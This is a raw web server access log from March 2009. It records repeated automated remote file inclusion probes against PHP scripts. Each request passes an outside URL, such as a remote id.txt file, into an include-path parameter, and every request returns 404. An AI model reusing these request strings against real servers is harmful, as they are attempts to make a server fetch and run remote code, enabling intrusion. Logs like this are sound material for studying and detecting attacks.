208.76.222.178 - - [22/Mar/2009:08:56:17 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
78.111.71.6 - - [22/Mar/2009:08:56:18 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:56:18 -0500] "GET ///vwar/backup/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
208.76.222.178 - - [22/Mar/2009:08:56:19 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
78.111.71.6 - - [22/Mar/2009:08:56:25 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:08:56:25 -0500] "GET ///vwar/backup/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
208.76.222.178 - - [22/Mar/2009:08:56:34 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:08:56:35 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:08:56:35 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.193.225.191 - - [22/Mar/2009:08:57:10 -0500] "GET /logs///vwar/backup/errors.php?error=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:08:57:11 -0500] "GET ///vwar/backup/errors.php?error=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
64.34.177.190 - - [22/Mar/2009:08:57:11 -0500] "GET /logs///vwar/backup/errors.php?error=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:08:57:11 -0500] "GET ///vwar/backup/errors.php?error=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
208.76.222.178 - - [22/Mar/2009:08:57:31 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:08:57:37 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:08:58:14 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:08:58:15 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
211.202.2.220 - - [22/Mar/2009:09:02:13 -0500] "GET /logs//help/german/top.php?nameonly=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:09:02:14 -0500] "GET /logs/access_log.1234742400//help/german/top.php?nameonly=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:09:02:14 -0500] "GET //help/german/top.php?nameonly=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
124.0.73.2 - - [22/Mar/2009:09:07:21 -0500] "GET /logs/access_log.1228608000//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
124.0.73.2 - - [22/Mar/2009:09:07:21 -0500] "GET //admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
124.0.73.2 - - [22/Mar/2009:09:07:22 -0500] "GET /logs//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
74.52.10.106 - - [22/Mar/2009:09:08:42 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.10.106 - - [22/Mar/2009:09:08:42 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.articlecatalog.info/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
78.111.71.6 - - [22/Mar/2009:09:10:40 -0500] "GET /logs/access_log.1228608000//admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:09:10:41 -0500] "GET //admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:09:10:41 -0500] "GET /logs//admin/index.php?_shop_path=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:09:11:38 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.23.17.145 - - [22/Mar/2009:09:11:38 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.yes-tech.co.kr//technote7/data/theme/id2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.172.33.230 - - [22/Mar/2009:09:12:52 -0500] "GET /logs/access_log.1235779200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:09:12:52 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:09:12:52 -0500] "GET /logs/access_log.1235952000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:09:12:52 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:12 -0500] "GET /~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:12 -0500] "GET /logs/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:12 -0500] "GET /logs/access_log.1233878400/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:17 -0500] "GET /logs/access_log.1234137600/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:40 -0500] "GET /logs/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:40 -0500] "GET /logs/access_log.1233878400/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:40 -0500] "GET /~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:09:18:45 -0500] "GET /logs/access_log.1234137600/~ListUser///////rgboard.php?rgboard_Path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:09:21:55 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 354 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:09:21:55 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 349 "-""libwww-perl/5.812"
203.251.81.216 - - [22/Mar/2009:09:22:14 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:09:22:14 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:09:22:14 -0500] "GET /logs/access_log.1235952000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:09:22:20 -0500] "GET /logs/access_log.1235779200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:09:24:04 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:09:24:04 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
112.76.46.5 - - [22/Mar/2009:09:31:05 -0500] "GET /include/oci8.php?inc_dir=http://itroit.com/zip/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
112.76.46.5 - - [22/Mar/2009:09:31:17 -0500] "GET /logs/include/oci8.php?inc_dir=http://itroit.com/zip/test.txt??? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
62.193.225.191 - - [22/Mar/2009:09:35:05 -0500] "GET /logs/access_log.1228608000//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:09:35:05 -0500] "GET //admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:09:35:06 -0500] "GET /logs//admin/index.php?_shop_path=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
91.52.131.75 - - [22/Mar/2009:09:38:15 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:09:38:15 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:09:38:23 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:09:38:24 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.geocities.com/tongdibanned/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
196.15.188.194 - - [22/Mar/2009:09:49:36 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
196.15.188.194 - - [22/Mar/2009:09:49:36 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
196.15.188.194 - - [22/Mar/2009:09:49:36 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.101.4.49 - - [22/Mar/2009:09:51:15 -0500] "GET //includes/login.php?_SESSION%5Bdocroot_path%5D=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Mar/2009:09:51:15 -0500] "GET /logs//includes/login.php?_SESSION%5Bdocroot_path%5D=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
211.172.225.50 - - [22/Mar/2009:09:53:38 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.172.225.50 - - [22/Mar/2009:09:53:38 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.172.225.50 - - [22/Mar/2009:09:53:38 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.172.225.50 - - [22/Mar/2009:09:54:07 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
70.38.71.140 - - [22/Mar/2009:09:57:33 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
70.38.71.140 - - [22/Mar/2009:09:57:33 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.20.51.114 - - [22/Mar/2009:09:58:56 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.20.51.114 - - [22/Mar/2009:09:58:56 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.20.51.114 - - [22/Mar/2009:09:58:56 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:10:00:01 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:10:00:02 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
80.20.51.114 - - [22/Mar/2009:10:00:30 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.8 - - [22/Mar/2009:10:01:50 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://admins.onceinalifespan.com/test.txt??? HTTP/1.1" 404 315 "-""Mozilla/3.0 (OS/2; U)"
77.221.130.8 - - [22/Mar/2009:10:01:50 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://admins.onceinalifespan.com/test.txt??? HTTP/1.1" 404 310 "-""Mozilla/3.0 (OS/2; U)"
67.15.48.29 - - [22/Mar/2009:10:02:47 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.15.48.29 - - [22/Mar/2009:10:02:47 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.52.253.194 - - [22/Mar/2009:10:03:28 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.52.253.194 - - [22/Mar/2009:10:03:28 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.86.137.18 - - [22/Mar/2009:10:03:32 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
70.86.137.18 - - [22/Mar/2009:10:03:33 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
67.99.100.113 - - [22/Mar/2009:10:04:48 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
67.99.100.113 - - [22/Mar/2009:10:04:48 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
69.73.155.62 - - [22/Mar/2009:10:05:30 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
69.73.155.62 - - [22/Mar/2009:10:05:30 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
200.162.171.247 - - [22/Mar/2009:10:05:38 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:05:38 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:05:38 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:05:52 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:05:52 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:05:52 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.19.130.218 - - [22/Mar/2009:10:05:57 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.19.130.218 - - [22/Mar/2009:10:05:57 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
200.162.171.247 - - [22/Mar/2009:10:06:04 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.162.171.247 - - [22/Mar/2009:10:06:31 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
196.15.188.194 - - [22/Mar/2009:10:07:52 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.bissmyk.pl/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.31.78.108 - - [22/Mar/2009:10:08:18 -0500] "GET /logs//index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
200.31.78.108 - - [22/Mar/2009:10:08:19 -0500] "GET //index.php?sayfa=http://firehacker.t35.com/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
200.234.200.134 - - [22/Mar/2009:10:10:25 -0500] "GET /logs/snippets/reflect/snippet.reflect.php?reflect_base=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
200.234.200.134 - - [22/Mar/2009:10:10:25 -0500] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
209.172.33.230 - - [22/Mar/2009:10:12:27 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:10:12:27 -0500] "GET /logs/access_log.1235433600//parse/parser.php?WN_BASEDIR=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:10:12:27 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.52.131.75 - - [22/Mar/2009:10:15:36 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:10:15:36 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:10:15:48 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.52.131.75 - - [22/Mar/2009:10:15:48 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.172.33.230 - - [22/Mar/2009:10:17:29 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:10:17:29 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
66.103.131.81 - - [22/Mar/2009:10:22:59 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:10:22:59 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:10:22:59 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:10:23:05 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
66.103.131.81 - - [22/Mar/2009:10:24:59 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://itcdial.co.uk/adsl/config//id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:21 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:21 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:21 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:23 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:23 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:23 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:36 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:25:39 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:26:18 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.179.197.134 - - [22/Mar/2009:10:26:18 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sauber-leerziehen.de/styles/templates/id1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
